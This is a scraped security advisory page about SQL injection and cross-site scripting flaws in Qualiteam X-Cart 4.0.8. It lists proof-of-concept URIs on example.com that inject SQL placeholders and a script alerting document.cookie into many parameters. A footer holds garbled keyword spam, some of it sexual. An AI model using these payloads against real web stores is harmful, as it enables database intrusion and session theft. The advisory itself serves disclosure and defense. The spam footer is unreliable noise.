exploits , vulnerabilities , articles , Qualiteam X-Cart SQL Injection and Cross-Site Scripting Vulnerabilities
| Title |
Qualiteam X-Cart SQL Injection and Cross-Site Scripting Vulnerabilities |
| Published |
2005-05-30-12:00AM |
| Updated |
2005-06-17-02:25PM |
| Class |
Input Validation Error |
| CVE |
CVE-MAP-NOMATCH |
| Remote |
Yes |
| Local |
No |
| Credit |
Discovery is credited to CENSORED <censored@mail.ru>. |
| Vulnerable |
Qualiteam XCart 4.0.8 |
| Not Vulnerable |
|
| Code |
An exploit is not required.
The following proof of concept URIs are available:
SQL Injection:
http://www.example.com/home.php?cat='[SQL-inj]
http://www.example.com/home.php?printable='[SQL-inj]
http://www.example.com/product.php?productid='[SQL-inj]
http://www.example.com/product.php?mode='[SQL-inj]
http://www.example.com/error_message.php?access_denied&id='[SQL-inj]
http://www.example.com/help.php?section='[SQL-inj]
http://www.example.com/orders.php?mode='[SQL-inj]
http://www.example.com/register.php?mode='[SQL-inj]
http://www.example.com/search.php?mode='[SQL-inj]
http://www.example.com/giftcert.php?gcid='[SQL-inj]
http://www.example.com/giftcert.php?gcindex='[SQL-inj]
Cross-site Scripting:
http://www.example.com/home.php?cat='><script>alert(document.cookie)</script>
http://www.example.com/home.php?printable='><script>alert(document.cookie)</script>
http://www.example.com/product.php?productid='><script>alert(document.cookie)</script>
http://www.example.com/product.php?mode='><script>alert(document.cookie)</script>
http://www.example.com/error_message.php?access_denied&id='><script>alert(document.cookie)</script>
http://www.example.com/help.php?section='><script>alert(document.cookie)</script>
http://www.example.com/orders.php?mode='><script>alert(document.cookie)</script>
http://www.example.com/register.php?mode='><script>alert(document.cookie)</script>
http://www.example.com/search.php?mode='><script>alert(document.cookie)</script>
http://www.example.com/giftcert.php?gcid='><script>alert(document.cookie)</script>
http://www.example.com/giftcert.php?gcindex='><script>alert(document.cookie)</script>
|
| TXT |
 |
|
Advertising
|
|
Copyright 2007,
SecurityDot
Fri, 18 Dec 2009 13:15:05 +0000
Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS
EXPLOITS
VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Www.al4a.n xp/exploit Sex in jal dfind ponographi Adults vid Gambar dew big black sex gairl www.99sego Foto Memek Exploit xo 200 /admin www.21yinx phpBB 2.0. winzip Gambar Sex sexfilam t /index2.ph www.xbshw. Kama Www.oldsex btitrakcer 200 /compo NFS hindu Nametha se includes/f doodh wali saxy photo 200 /compo www.dailys Videoxx se Name the sexymo cant bust shopdbtest armspit osCommerce WWW.Sex.co Kerala sex sex doog a www.kmnice bigboob lau igi WWW.Sex18. MS06-040 WWW.Vidio Lankasri.c
|
